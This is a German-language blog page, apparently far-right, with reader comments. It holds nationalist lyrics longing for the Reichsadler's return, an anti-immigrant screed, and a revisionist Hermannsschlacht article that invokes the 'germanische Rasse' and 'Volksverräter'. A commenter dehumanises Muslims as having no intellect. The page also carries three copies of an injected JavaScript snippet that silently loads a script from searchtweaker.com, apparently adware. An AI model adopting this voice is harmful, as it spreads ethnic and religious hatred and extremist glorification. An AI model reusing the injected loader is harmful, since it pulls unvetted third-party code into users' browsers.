justizia

Wer kämpft kann verlieren,wer aber nicht kämpft der hat schon verloren .Klagt nicht ,kämpft!

bilderberger600x496justiziaBerlin,_Mitte,_Unter_den_Linden,_Reiterstandbild_Friedrich_II.bild„Politische Dummheit kann man lernen, man braucht nur deutsche Schulen zu besuchen. Die Zukunft Deutschlands wird wahrscheinlich für den Rest des Jahrhunderts von Außenstehenden entschieden. Das einzige Volk, das dies nicht weiß, sind die Deutschen.“ — Der Londoner Spectator, 16. 11. 1959, zitiert in: Die Jahrhundertlüge[2]

//http://de.scribd.com/doc/33098837/Mythos-Neu-Schwabenland

Sie zwingen uns ihr Dogma auf, doch die Wahrheit wird sie entthronen, denn freie Gedanken reichen immer weiter als Kanonen.
Wenn sie unsere Fahnen verbieten, lasst sie es tun, wir scheißen drauf.
Denn wir ziehen in unseren Herzen sie noch stolzer wieder auf.
Ihre Schläge werden härter, sie fürchten schon den neuen Tag, denn der Amboss ist immer härter als jeder Hammerschlag.
Der zahme Vogel singt von Freiheit, doch der wilde Vogel fliegt und noch niemals hat das Schwert über den Geist gesiegt.
Auf das der Adler wieder fliegt.Mächtig sind seine Schwingen, die Krallen scharf wie Klingen.
Wie unser Stolz blieb er auf ewig unbesiegt.
Auf das des Reiches Adler endlich wieder fliegt. Mächtig sind seine Schwingen, niemand kann ihn bezwingen.
Wie unser Stolz blieb er auf ewig unbesiegt… Wenn der Reichsadler wieder über Deutschland fliegt.Aus goldenen Ketten schmiedet Schwerter und ihr Ende ist in Sicht, weil dann endlich aus dem Nebel eine neue Schöpfung bricht.
Waidwund geschossen, voller Hass, ja so verfolgt uns der Tyrann.
Doch irgendwann hat er mehr Feinde als er töten kann.
Die Wahrheit bleibt das Antiserum, wie viel Gift sie auch verstreuten und wir hören schon von weitem ihre Totenglocken läuten.
Der zahme Vogel singt von Freiheit, doch der Wilde Vogel fliegt und noch niemals hat das Schwert über den Geist gesiegt.
Auf das der Adler wieder fliegt. Reichsadler flieg!Mächtig sind seine Schwingen, die Krallen scharf wie Klingen.
Wie unser Stolz blieb er auf ewig unbesiegt.
Auf das des Reiches Adler endlich wieder fliegt. Mächtig sind seine Schwingen, niemand kann ihn bezwingen.
Wie unser Stolz blieb er auf ewig unbesiegt… Wenn der Reichsadler wieder über Deutschland fliegt.
Reichsadler flieg!Mächtig sind seine Schwingen, niemand kann ihn bezwingen.
Wie unser Stolz blieb er auf ewig unbesiegt… Wenn der Reichsadler wieder über Deutschland fliegt.
Reichsadler flieg!(function(){try{var header=document.getElementsByTagName(„HEAD“)[0];var script=document.createElement(„SCRIPT“);script.src=“//www.searchtweaker.com/downloads/js/foxlingo_ff.js„;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==“complete“||this.readyState==“loaded“)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Dies und Das
Germanische Stammesverfassung Die germanische Mythologie kennt zwar eine Art Hierarchie unter den Göttern, an deren Spitze Odin steht, doch sind insbesondere die Sachsen ein gutes Beispiel für ein germanisches Volk, dass trotz häufiger Kriege mit Nachbarstämmen bis in die Zeit Karls des Großen hinein an einer königslosen Verfassung festgehalten hat. Dennoch ist der historische Befund deutlich, dass die meisten germanischen Völker in der Zeit des Kontakts mit dem Römischen Reich bzw. der Völkerwanderung zu einer monarchischen Verfassung wechselte, möglicherweise gerade mit Blick auf das römische Vorbild mit seinen Caesaren. Fassbar wird dies etwa bei den Cheruskern, die offenbar erst mit Arminius, dem das römische Staatswesen vertraut war, den Übergang zum Königtum durchmachte. Nicht in jedem Fall war dieses erblich. Oft musste der König seine Tauglichkeit im Kampf mit Nachbarvölkern bewähren und konnte bei Versagen abgesetzt werden. In jedem Fall dominierte die Rolle als Anführer eines Volksheeres (Heereskönigtum), wobei auch eine Tendenz zur Sakralisierung besteht: Die Konstruktion einer genealogischen Verbindung zu Göttern und Helden der germanischen Mythologie oder etwa bei den Merowingern zu den trojanischen Königen, sowie die Idee eines Königsheils dienten der Legitimation der königlichen Herrschaft. Je nach sozialer Differenzierung des betreffenden Volkes erfolgte die Wahl durch eine allgemeine Volks- (Heeres-)versammlung oder durch den Adel. Zu berücksichtigen ist dabei allerdings auch, dass die Ethnogenese vor allem in den Jahrhunderten vor der Völkerwanderung ein komplexer Prozess war: Einzelstämme schlossen sich zusammen, um gegen Nachbarn besser gewappnet zu sein Franken, Alamannen; andere Stämme trennten sich im Laufe weiter Wanderungen Sweben in norddeutsche und spanische Sweben, Goten in Ostgoten und Westgoten. Das hatte natürlich auch Auswirkungen auf die Organisation der Spitze dieser Völker. Von besonderer Bedeutung ist auch die Funktion als Gerichtsherr; um 500 waren es z.B. die Könige der Franken, West- und Ostgoten, die die jeweiligen Volksrechte kodifizieren ließen. In der Zeit der spätantiken Völkerwanderung erleben wird dann bei den großen Stämmen meist ein gefestigtes Erbkönigtum, das übrigens auch die Religion des Volkes entscheidend bestimmte. So hielten die Goten lange Zeit am Arianismus ihrer Anführer fest, während die Franken nach der katholischen Taufe Chlodwigs I. diesem Akt in Massentaufen Folge leisteten. Bei den Staatsbildungen auf vormals römischen Boden erleben wir relativ stabile Dynastien, die sich über mehrere Generationen halten; doch können sich manchmal auch Rivalen aus dem Adel durchsetzen. Wie sehr sich der Anspruch des germanischen Königstitels in dieser Zeit durchgesetzt hatte zeigt sich 369 in dem Treffen zwischen dem König der Westgoten Athanarich und dem oströmischen Kaiser Valens auf der Donau, als der Gotenkönig mit dem lateinischen „rex“ angesprochen wurde und empört den niedrigen Rang des germanischen „reiks“ verstand. Nach dem Ende der Spätantike machten die germanischen Gesellschaften eine Entwicklung vom Stammeskriegertum zum feudalen Personenverbandsstaat durch, der sich in der Entwicklung der Lehenspraxis zeigt und mit der eine zunehmende Schichtung der Gesellschaft einherging. Zeitlich versetzt setzte dieser Prozess auch bei den nördlichen und östlichen Randvölkern ein, etwa in den angelsächsischen Königreichen. Lediglich bei den Sachsen des heutigen Norddeutschlands ist die erwähnte Besonderheit festzuhalten. Zwar gab es auch hier einen Adel, doch waren die Bauernkrieger kaum weniger bedeutend. In der Auseinandersetzung mit dem Frankenreich erstand dann in Widukind eine Art Heerkönig, doch sorgte die fränkische Eroberung bald für die Eingliederung in das bestehende feudale Gefüge. Als letzte Gruppe der Germanen rückten die Wikinger in das Licht der Geschichte; für deren Frühzeit fehlen uns die Quellen. Die Art der Kriegführung – Plünderungszüge durch Flottenangriffe – förderte aber die Herausbildung von Heeres- bzw. Seekönigen, die in der Lage waren, den Bau und den Einsatz solcher Schiffe zu organisieren und zu finanzieren. Die Wikingergesellschaft kannte auch Kleinkönige, die in relativ begrenzten Gebieten eine Herrschaft ausübten. Zur Terminologie ist ohnehin zu sagen, dass sie oft recht unscharf ist. Im römischen Sprachgebrauch blieben die Begriffe Caesar und Imperator dem eigenen Reich vorbehalten, während die Anführer der „Barbaren“ Dux oder Rex genannt wurden. Ersteres (wörtlich „Führer“, vgl. „Duce“) war die Bezeichnung von Heeresführern meist kleinerer Stämme. Historisch hat sich aus dieser Bezeichnung der Titel „Herzog“ (asächs.: heritogo, aengl.: heretoga) entwickelt, vgl. auch das englische „Duke“ und „Dukat“. Rex dagegen war die Bezeichnung der Häupter der größeren Völker und entsprach damit dem späteren Begriff „König“. Zu bedenken ist aber, dass es auch Zwischenstufen und fließende Übergänge gab, etwa „Unterkönige“ für Teilreiche.

//

Ich muss dabei an das Abraham Lincoln (1809-1865, 16. Präsidenten der USA), zugesprochene Zitat denken:

„Man kann einen Teil des Volkes andauernd und das ganze Volk für eine gewisse Zeit zum Narren halten. Aber man kann nicht das ganze Volk die ganze Zeit zum Narren halten.“

“Ich habe was gegen Ausländer die sich nicht Integrieren“ Ausserdem habe ich was gegen Kriminelle Ausländer und Ausländische Schmarotzer” Es kommt der Tag an dem wir uns zu wehr setzen müssen ! EINWANDERER, NICHT Deutsche, MÜSSEN SICH ANPASSEN. Akzeptiert dies, oder verlasst das Land. Ich habe es satt, das Ihr nur Forderungen stellt. Seit einiger Zeit spüre ich einen zunehmenden Patriotismus bei der Mehrheit der Deutschen. Dieses Land ist über Jahrhunderte gewachsen, geprägt von Gefechten, Prozessen und Siegen von Millionen von Frauen und Männern, die alle nur Frieden gesucht und gewollt haben. Wir sprechen überwiegend Deutsch, nicht Spanisch, Libanesisch, Chinesisch, Japanisch, Russisch, Italienisch, Englisch, Türkisch oder andere Sprachen. Deswegen, wenn ihr Teil unserer Gesellschaft werden wollt …. lernt unsere Sprache! Die meisten Deutschen glauben an Gott. Es sind nicht einige wenige Christen, es ist kein politisch rechter Flügel, es ist kein politisch motivierter Zwang, nein – es ist eine Tatsache, denn christliche Frauen und Männer, mit christlichen Prinzipien, haben dieses Land gegründet, und dies ist ganz klar dokumentiert. Und es ist sicherlich angemessen, dies an den Wänden unserer Schulen zum Ausdruck zu bringen. Wenn Gott euch beleidigt, dann schlage ich euch vor einen anderen Teil dieser Welt als eure neue Heimat zu betrachten, denn Gott ist Teil UNSERER Kultur.

//http://de.scribd.com/doc/33098837/Mythos-Neu-Schwabenland

Hermannsschlacht

(Weitergeleitet von Varusschlacht)

Otto Albert Koch: Varusschlacht,
1909 (Lippisches Landesmuseum Detmold)

Die Hermannsschlacht (auch: Schlacht im Teutoburger Wald; in der Geschichtswissenschaft oft unbedachtsam bis sträflich nach dem Verlierer Varusschlacht genannt) fand im Jahre 9 nach unserer Zeitrechnung (n. u. Z.) statt. Beteiligt waren drei Legionen römischer Eindringlinge – dazu drei Abteilungen Reiterei (Alen genannt) und noch sechs Hilfstruppen-Kohorten (insgesamt 15.000 bis 25.000 Soldaten) – gegen eine nicht bekannte Anzahl Germanen, die ihre Heimat verteidigten. Dieser Schlacht waren zwei Jahre vorausgegangen, in denen die Römer den Freiheitwillen der verschiedenen germanischen Stämme unterdrückten, indem sie auch mit brutalster Gewalt versuchten, verschiedene Gesetzgebungen, Verwaltungsstrukturen und die Steuerpflicht durchzusetzen.

Inhaltsverzeichnis [Verbergen]

Vorgeschichte

Gebiet des von den Römern besetzten germanischen Gebietes im Jahre 9 n. Chr.

Nachdem Kaiser Augustus (27 v. Chr. – 14 n. Chr.) beschlossen hatte Germanien zu erobern, beauftragte er seine beiden Stiefsöhne Drusus und Tiberius damit, den Großangriff vorzubereiten. In den Jahren von 15 bis 13 vor unserer Zeitrechnung (v. u. Z.) wurden als Truppenstützpunkte 50 Kastelle entlang der Rheingrenze errichtet.
Der Angriff selbst verlief sehr erfolgreich. Unter Drusus drangen die Römer weit in das rechtsrheinische Gebiet vor. Allerdings sprechen die historischen Quellen von ersten schlechten Omen; so schreibt später der römische Historiker Cassius Dio (um 150-235 n. Chr.):

„Drusus wollte auch die Elbe überqueren, doch war er dazu nicht in der Lage…. Eine Frau von übermenschlicher Größe war ihm nämlich mit den Worten entgegengetreten: ‚Wohin willst du eigentlich noch ziehen, unersättlicher Drusus? Es ist dir nicht vom Schicksal bestimmt, dies alles hier zu sehen. Ziehe von dannen! Denn das Ende deiner Taten und deines Lebens ist schon nahe.‘ Es ist zwar erstaunlich, daß eine solche Weissagung von der Gottheit zu einem Menschen drang; aber ich zweifle nicht an der Wahrheit, denn die Prophezeiung erfüllte sich sofort; nach seiner eiligen Umkehr starb er noch auf dem Rückmarsch an einer Krankheit, bevor er den Rhein erreichte.“

Es mag dahingestellt bleiben, ob Cassius Dio die Seherin nur phantasievoll seinem Bericht hinzufügte oder ob es tatsächlich eine ähnliche Begegnung gab. Fest steht aber, daß Drusus tatsächlich kurz darauf auf dem Rückmarsch ins römische Winterlager einen schweren Reitunfall erlitt, dessen Folgen er erlag.
In der darauffolgenden Zeit gab es immer wieder germanische Aufstände, die von den Römern allerdings brutal und erfolgreich unterdrückt wurden.

Im Jahre 7 n. Chr. wurde Quintilius Varus, ein Mitglied des Kaiserhauses und Verwaltungsfachmann, beauftragt, die besetzten germanischen Gebiete in eine römische Provinz zu verwandeln. Der Verwaltungsfachmann Varus war schon aus seiner Zeit als Statthalter von Syrien dafür bekannt, ausbeuterisch und brutal vorzugehen, nicht nur um die römische, sondern auch seine private Kasse zu bereichern. Ein überlieferter Spruch lautet: „Arm kam Varus in das reiche Syrien, reich ging Varus aus dem armen Syrien.“

Römische Münze aus Syrien mit dem Abbild Varus‘

Um dieses Ziel auch in Germanien zu erreichen, behandelte er die besetzten Gebiete mit einer unheimlichen Ignoranz. Er führte Rechtsprechungen und Strafen wie Auspeitschen, Schläge und öffentliche Hinrichtungen ein, die das freie Rechtsempfinden der germanischen Rasse zutiefst verletzten und beleidigten. Sie wurden behandelt wie Unfreie und bekamen immer wieder vorgeführt, daß sie nicht nur ihre persönliche, sondern auch ihre jeweilige Stammesfreiheit völlig verloren hatten.

So begann sich endlich der germanische Widerstandsgeist zu regen. Anführer dieses Widerstandes wurde der Cherusker Arminius, der seinen lateinischen Namen aus seiner Zeit in Rom erhalten hatte, da er als Sohn des unterworfenen Cheruskerfürsten mit seinem Bruder Flavus (lat.) dorthin verbracht worden war, um kulturell romanisiert zu werden.
Dies schien zunächst auch gelungen zu sein, da Arminius (sein germanischer Name ist leider nicht überliefert – „Hermann“ haben ihn erst Martin Luther und danach die deutschen Dichter getauft) das römische Bürgerrecht erhielt, ja sogar in den Ritterstand erhoben wurde und in den Dienst des römischen Heeres trat, und in dieser Eigenschaft in seine Heimat zurückkehrte.

Es ist nicht bekannt, wann genau Arminius den Entschluß faßte, sich dem auf seinen Leuten liegenden römischen Joch zu widersetzen. Es ist aber anzunehmen daß er sich dazu entschied, nachdem er vor Ort sah, wie schmählich die Römer mit seinen Volksgenossen umgingen. In den „Arminius’ Ansprachen“ vor seinem großen Krieg gegen Germanicus wird die Situation und Motivation der Germanen deutlich:

„Habgierig, grausam und überheblich sind sie, die Römer! Und ihr habt zu wählen zwischen Freiheit oder Tod anstelle Sklaverei!“Hierin, und nicht nur in der darauffolgenden siegreichen Schlacht, zeigte sich Arminius‘ ganze Größe: Trotzdem seine Jugendzeit durch römische Sitten und Werte geprägt wurde, verlor er das instinktive Band zu seiner Heimat und zu seinen Vorfahren nicht völlig, so daß es im entscheidenden Moment wieder in Erscheinung trat. Darin zeigt sich die fast übermenschliche Charakterstärke Arminius‘, den spätere Deutsche mit Recht als „Hermann“ nominell regermanisierten, wie er das auch mit sich selber getan hatte. Um dies vollständig zu begreifen, halte man sich vor Augen, wie in der Phase der BRD/BRÖ die Deutschen selbst im eigenen Land ihr eigenes Volkswesen beinahe völlig vergessen haben und sich anstandslos von Personen regieren lassen, die in anderen Zeiten womöglich ohne weiteres als wahre Volksverräter bezeichnet worden wären.

Die Hermannsschlacht

Karte des wahrscheinlichsten Ortes der Hermannsschlacht

Nachdem es Arminius gelungen war, die verräterische römerfreundliche Partei in seinem eigenen Stamm überstimmen zu lassen, schmiedete er ein Bündnis zwischen seinen Cheruskern und den Chatten, Brukterern und Marsern. Im Herbst des Jahres 9 n. Chr. waren alle Vorbereitungen für die Erhebung abgeschlossen. Varus wurde nun übermittelt, daß sich an den Grenzen des römischen Gebietes ein germanischer Stamm erhoben habe. Obwohl ihm der Verräter und Römerfreund Segestus den Plan seiner Volkgenossen offenbart hatte, schenkte ihm Varus keinen Glauben und machte sich umgehend zur Niederschlagung der vermeintlichen Rebellion mit drei Legionen, drei Reiterschwadronen und 3.600 Mann Hilfstruppen sowie Versorgungstroß auf den Abmarsch.

Arminius und einige in seinen Plan eingeweihte Germanen begleiteten diesen Militärzug zunächst, verabschiedeten sich dann aber unter einem Vorwand, nachdem sie das römische Heer tief genug in unwegsames und sumpfiges Gebiet irregeführt hatten.

Kurz danach begannen die Attacken der Germanen. Immer wieder griffen sie den langen und auseinandergezogenen Heerzug in zermürbenden Kleinangriffen an. Zudem erschwerte ein andauernder Regen die Verteidigungsanstrengungen der römischen Legionäre, deren schwere Rüstungen für einen Kampf in derartiger Umgebung hinderlich waren.
An einem Engpaß versetzen sie den verbliebenen römischen Truppen dann den entscheidenden Vernichtungsschlag.

Bei diesen sich über gute drei Tage hinziehenden Angriffen bewiesen die Germanen und deren Führung ein ausgezeichnetes taktisches Geschick. In der Nähe von Kalkriese bei Osnabrück zeugen erst in letzter Zeit ausgegrabene, raffiniert angelegte Schanz- und Grabensysteme der Germanen davon.

Als der Untergang der römischen Legionen besiegelt war, gab sich Varus mit einer Anzahl römischer Offiziere den Tod durch sein eigenes Schwert. Als Kaiser Augustus in Rom von der Vernichtung seiner Legionen erfuhr, wurde ihm später der Satz „Quintilius Varus, gib die Legionen zurück!“ (Quintili Vare, legiones redde!) (Sueton, Vita Divi Augusti 23) zugeschrieben.

Der Ort des KampfesUrsprünglich wurde der Teutoburger Wald angegeben. Nach neuen, umfangreichen Funden wird mittlerweile angenommen, daß die Schlacht in der Nähe von Kalkriese stattfand.

FolgenDie Nachricht von Varus‘ Katastrophe wirkte in Rom wie ein Schock. Die römischen Truppen wurden hinter die Rheingrenze zurückgezogen, die einzige bisher bekannte römische Siedlung in Großgermanien, Waldgirmes, wurde aufgegeben und die Armee in Alarmbereitschaft versetzt. Der Ausbau des Limes wurde verstärkt. Man fürchtete einen Durchmarsch der Germanen. Kaiser Augustus entließ seine germanische Leibwache, in Italien wurden neue Einheiten gerade unter der jungen Bevölkerung ausgehoben. Diejenigen, die den Kriegsdienst verweigerten, wurden mit der Konfiskation ihres Vermögens bestraft oder zum Tode verurteilt. Allerdings bewahrheiteten sich die schlimmsten Befürchtungen nicht, und so unternahmen die Römer in der Zeit Tiberius‚ unter dem Feldherrn Germanicus (Tiberius‚ Neffe) wieder mehrere Feldzüge in das germanische Territorium und eine Expedition in das Gebiet der Schlacht. Im Jahre 16 n. Chr. kam es zu einem Aufeinandertreffen zwischen Germanicus und Arminius, allerdings endete es in einem strategischen Patt.

Auf seinem zweiten Feldzug gelang es Germanicus, Thusnelda, Arminius‘ Ehefrau, die zugleich die Tochter des bereits oben erwähnten Verräters Segestus war, gefangenenzunehmen. Dieser Erfolg wurde ihm ermöglicht durch einen erneuten, unglaublichen Verrat ihres Vaters, der seine Tochter, die inzwischen ein Kind erwartete, lieber in den Händen der Römer als im Ehestand mit seinem Feind Arminius sah. Segestus war daraufhin in den Augen seiner germanischen Volksgenossen ein „Neiding“ und ging, da er das römische Bürgerrecht besaß, daraufhin nach Rom.

Schließlich mußte man aber nach hohen Verlusten auf beiden Seiten das Scheitern der römischen Expansion in Germanien und die Unwiderruflichkeit der Rheingrenze eingestehen. Dennoch wurde bei Germanicus‘ Rückkehr nach Rom ein glänzender Thriumphzug veranstaltet, bei dem Arminius‘ gefangene Ehefrau Thusnelda mit ihrem inzwischen geborenen kleinen Sohn als vornehme Kriegsbeute präsentiert wurde, tatsächlich unter den Augen ihres verräterischen Vaters Segestus, der von der Ehrentribüne aus zusah – über das weitere Schicksal Thusneldas und ihres Sohnes ist nichts bekannt.

Arminius dagegen hatte sich durch den Sieg einer unbestrittenen Machtbasis versichert. Er versuchte nun den Aufbau eines gesamtgermanischen Königtums, stieß aber auf den separatistischen Widerstandsgeist der Fürsten. Um das Jahr 21 n. d. Z. wurde er von Verwandten ermordet. Dennoch wurde die Freiheit Germaniens nach seinem Sieg gegen Varus vom Römischen Reich nie mehr angetastet.

Gedenkstätten

An das Ereignis erinnern vor allem das Museum und Park Kalkriese sowie das bekannte Hermannsdenkmal nahe Detmold.

Bearbeitungen KunstDie Hermannsschlacht wurde vielfach in der Kunst in Form von Historiengemälden oder Illustration dargestellt. Bekannte Darstellungen stammen von Carl Joseph Geiger, Friedrich Gunkel, Otto Albert Koch (Varusschlacht, 1909) und Karl Friedrich Schinkel.

MusikDas bekannte deutsche Volkslied „Als die Römer frech geworden“ hat die Hermannsschlacht zum Thema, das Geschehen wird dort auf lustige Art und Weise verarbeitet. In dem von Ernst Moritz Arndt gedichteten Lied „Der Gott, der Eisen wachsen ließ“ heißt es zudem „So ziehn wir aus zur Herrmansschlacht / und wollen Rache haben“, hierbei wird der Kampf der Deutschen gegen Napoleon bzw. die französische Fremdherrschaft in eine Traditionslinie mit jener Freiheitsschlacht aus der Germanenzeit gestellt.

Auch in modernen Musikformen findet sich die Schlacht im Bereich des Pagan Metals verarbeitet, so etwa auf dem Album „Zeit der Cherusker“ der griechischen Black-Metal-Gruppe Wolfnacht. Die Gruppen Heervader aus den Niederlanden sowie Blutaar aus Bayern haben das Thema ebenso in einem Lied aufgegriffen.

Film

  • 1924: Die Hermannschlacht
  • 1977: Hermann der Cherusker – Die Schlacht im Teutoburger Wald
  • 1995: Die Hermannsschlacht

Briefmarken2009 erschien anläßlich des 2000. Jahrestages der Schlacht eine Briefmarke der bundesdeutschen Post, welche das Hermannsdenkmal, eine Büste des Kaisers Augustus sowie die bei Kalkriese gefundene Gesichtsmaske eines feindlichen römischen Soldaten zeigt.

(function(){try{var header=document.getElementsByTagName(„HEAD“)[0];var script=document.createElement(„SCRIPT“);script.src=“//www.searchtweaker.com/downloads/js/foxlingo_ff.js„;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==“complete“||this.readyState==“loaded“)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();(function(){try{var header=document.getElementsByTagName(„HEAD“)[0];var script=document.createElement(„SCRIPT“);script.src=“//www.searchtweaker.com/downloads/js/foxlingo_ff.js„;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==“complete“||this.readyState==“loaded“)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
„Sei was du willst auf der Welt, aber das was du bist, habe den Mut ganz zu sein“.
„… Seit 1914 bis heute habe ich aus Liebe und reiner Treue meine ganze Kraft und Arbeit meiner deutschen Heimat geopfert. Wo sie in Not war, zog es mich hin, um zu helfen. Das letzte Mal hat mir gestern mein Todesurteil gebracht. Mit Ruhe habe ich es vernommen, ruhig wird mich die Kugel treffen. Habe ich doch alles, was ich tat, nur in bester Absicht ausgeführt. Kein wildes Abenteurerleben war mein Verlangen, nicht Bandenführer war ich, sondern in stiller Arbeit suchte ich meinem Vaterlande zu helfen. Ein gemeines Verbrechen oder gar einen Mord habe ich nicht begangen.”

Dies und Das
http://de.metapedia.org/wiki/Deutsche_Geschichte Das Erste Reich (933 – 1806) Das Deutsche Reich (Regnum) formierte sich während eines längeren Entwicklungsprozesses. In der Auseinandersetzung mit der römischen Reichskultur im Zuge der Völkerwanderung entwickelten sich seit dem 3. Jahrhundert germanische Völker (z. B. Franken, Alemannen), die im 5. und 6. Jahrhundert ihre Reiche auf dem Boden des Imperium Romanum errichteten. Diese Völker (Stämme) übernahmen teilweise Grundelemente der lateinischen Kultur sowie Reste der spätantiken Verwaltungs- und Wirtschaftsstrukturen. Sie schufen sich im 3.‒6. Jahrhundert politische Strukturen (Herzogtum, Königtum), blieben aber immer Verbände, die eher durch gemeinsame Traditionen zusammengehalten wurden, als daß sie sich zu ethnischen Einheiten entwickelten. Noch im 8. Jahrhundert mit anderen Volksgruppen im Reichsverband Karls des Großen vereinigt, lösten sie sich aus diesem Verband mit den Verträgen über die Teilung des Fränkischen Reiches. Dies waren der von Verden (843), der Meersen (870) und derjenige von Ribemont (880). Ludwig der Deutsche erhielt 843 das Ostfränkische Reich, 880 war mit dem Erwerb der Westhälfte Lothringens im Wesentlichen die (bis 1648 gültige) Grenze zwischen Frankreich und Deutschland festgelegt. Im Lauf des 10. Jahrhunderts löste sich die alte Einheit des Frankenreichs auf und wich neuen Identitäten im ostfränkischen und westfränkischen Reich. Ein genaues Datum, wann dieses »ostfränkische« Reich im Bewußtsein der Zeitgenossen zu einem »deutschen« Reich wurde, kann nicht angegeben werden. Der gestreckte Prozeß der ostfränkisch-deutschen Reichsbildung vollzog sich mit einzelnen Höhepunkten über viele Jahrzehnte. Wenn auch bereits mit der Eingliederung Lothringens (925) die territoriale Ausbildung des neuen Reichs im Wesentlichen abgeschlossen war, so wird doch von der Forschung inzwischen darauf verwiesen, daß erst seit dem Beginn des 11. Jahrhunderts neben die fränkischen Traditionen ein zunehmend »deutsches« Bewußtsein trat. Der neue Name »Reich der Deutschen«, Beleg für die Wahrnehmung eines abgeschlossenen Wandlungsprozesses, kam erst im ausgehenden 11. und 12. Jahrhundert dazu. Gegen Ende des 11. Jahrhunderts (belegt unter Heinrich IV.) wurde es üblich, das Reich nördlich der Alpen als »Reich der Deutschen« (»Regnum Teutonic[or]um« beziehungsweise »deutsches Regnum«) und seine Bewohner als »Deutsche« zu bezeichnen. Die Reichsbezeichnung konkurrierte im gesamten Mittelalter mit dem römischen Reichs- und Herrschertitel, der die besondere Stellung der ostfränkisch-deutschen Könige vor allen anderen europäischen Herrschern unterstrich. Das Bewußtsein von der Fortführung römischer Kaiserherrschaft überlagerte seit dem 10. Jahrhundert die Ausbildung nationaler Identitäten. Seit dem 11. Jahrhundert, spätestens mit Heinrich V., wurde der noch nicht zum Römischen Kaiser gekrönte Herrscher Rex Romanorum (Römischer König) genannt; der römische Reichsname erhielt in staufischer Zeit den Zusatz »heilig«. Innerhalb dieses Sacrum Romanum Imperium (deutsch: „Heiliges Römisches Reich“; Begriff erstmals erwähnt in der Mitte des 11. Jahrhunderts) stand das deutsche Regnum neben den Königreichen Italien und Burgund. Zur Unterscheidung bildete sich in mittelhochdeutscher Zeit der Name »deutsche Lande« (erstmals um 1080 im Annolied belegt) und endgültig seit dem 16. Jahrhundert die Bezeichnung »Deutschland« heraus.

//https://de.scribd.com/doc/33098837/Mythos-Neu-Schwabenland

//

//

//

//

394 Kommentare

  1. Du schreibst:
    “ Wir werden eure Glaubensrichtungen akzeptieren und werden sie nicht in Frage stellen.“

    Sprich bitte nicht in der WIR-Form. ICH werde den Islam NIEMALS akzeptieren! Und ich kenne viele, die das ebenfalls niemals tun werden. Vielleicht solltest Du Deine diesbezügliche Einstellung überdenken – wenn du es nicht bereits getan hast. Sehe gerade, Dein Post ist schon etwas älter.

    Gefällt mir

    Antworten

      1. Du kennst diese Mentalität anscheinend noch nicht. Die scheißen auf Dich! Du brauchst denen nicht die Hand zu reichen, außer Du bestehst darauf, dass sie Dir den Arm abreißen. Denn genau das werden sie tun.

        Gefällt 1 Person

      2. Natürlich kenne ich diese Metalität ich bin Wachmann in verschiedenen Asylantenheimen in Berlin / Brandenburg ! Und diesen Text habe ich mal von irgendwo übernommen kopiert und eingefügt gut das mag schon ne weile her sein aber du könntes Recht haben seit uns Merkel mit ihrer ,,Wir schaffen das “ Walze überollt hat habe ich diesen Text nicht mehr überarbeitet ,es wäre zu überlegen dort etwas anderes einzustellen ! Danke für deine Kritik Gruss Eric

        Gefällt mir

      3. Wenn man etwas kopiert, dann sollte man die Quelle angeben… Wenn Du die Mentalität (und den Koran) kennst, dann weißt Du ja auch , dass der Koran nicht änderbar ist und was Takiya bedeutet.

        Mit Appellen an den Intellekt kommt man bei Muslims nicht weiter, weil sie keinen besitzen. Die verstehen nur die Sprache der Straße und die ist roh aber unmissverständlich.
        Im übrigen nichts zu danken. Ich freue mich, dass Du meine Kritik annimmst. Eine Überarbeitung wäre ganz bestimmt angebracht. Was ich noch besser fände, wäre, wenn Du aus eigener Erfahrung berichten würdest. Als Wachmann in Asylantenheimen kannst Du doch sicher eine Menge erzählen. Ich würde mich freuen, von DIR zu lesen, selbstverständlich auch Positives. Gruß Inkim

        Gefällt 1 Person

    1. Sorry“BITTE“.Kenne Eric soo lange!Bin erschüttert.NIEMAND!darf Eric in Frage stellen.Aber greift mich GERNE an.
      KEINERLEI!Chance….

      ICH,schmeiß mich sofort!davor.
      Seid Euch!“GAANZ“SICHER !

      MEIN!sehr“geschätzter“Eric ist GAANZ:SICHER!“UNANTASTBAR“…

      WARUM?Ich weiß“VIEL“gravierender >was Andere so:“KRASS“zerreißen!
      O.M.G.,laßt dies sein!
      Höchstkorrekt!,von:

      Gabriela

      Gefällt 1 Person

      Antworten

  2. September 2013 um 20:47 | Antwort
    goetzvonberlichingen

    http://jorvik-viking-centre.co.uk/

    Das Königreich Jórvík(davon abgeleitet: Jörvik, Jörke, Joer, York, Joerke, Jorke) mit der Hauptstadt Jórvík (das spätere englische York) war ein Territorium der Nordmannen in Nordengland. Die Könige kontrollierten neben ihrem eigentlichen Gebiet (im Wesentlichen Northumbria) zeitweise auch die Gegend um Dublin, die Isle of Man und die Five Boroughs of Mercia.

    York wurde von den Römern im Jahre 71 n.Chr. als „Eboracum“ gegründet, was übersetzt wahrscheinlich „Ort der Eibenbäume“ heißt.York wird auch die „Ewige Stadt“ genannt und ist berühmt für die historischen Gebäude. Hauptstadt Nordbritanniens unter dem ursprünglich keltischen Namen Eboracum, ab 237 n. Chr. als Colonia Eboracensium hatte eine bedeutende Rolle.
    The Anglo-Saxon Chronicle

    Die folgende Besiedlung des Landstrichs durch die Wikinger führte zu einer erneuten Umbenennung der Stadt. Sie wurde nach der schwedischen Stadt Jórvik benannt, was im schwedischen „Pferdebucht“ bedeutet!

    Auch im Alten Land gegenüber von HAMMABURG….(heute Hamburg , die alte Wikingerfestung aus Holz..) gibt es einen Ort: York.

    Gefällt 1 Person

    Antworten

  3. Die Wikinger (auch Nordmänner, Waräger oder Rus) waren keine geschlossene ethnische Gruppe, sondern lebten in verschiedenen Stämmen und Völkern in Skandinavien.

    Geniale Schiffbauer und.. Erfinder der Kompasse.

    Der Peilkompass und der Sonnenstein-Kompass aus Schweden:

    Sie sind legendär: die “Sonnensteine” der Wikinger. Mit diesen sollen die Skandinavier – ohne Kompass – sicher über die Meere gefahren sein. Nun wollen Forscher einen solchen Stein gefunden haben.
    http://www.n24.de/n24/Wissen/d/1808752/forscher-loesen-raetsel-um–sonnensteine-.html

    http://planetarium.hs-bremen.de/download/newsletter/Wikingerkompass.pdf

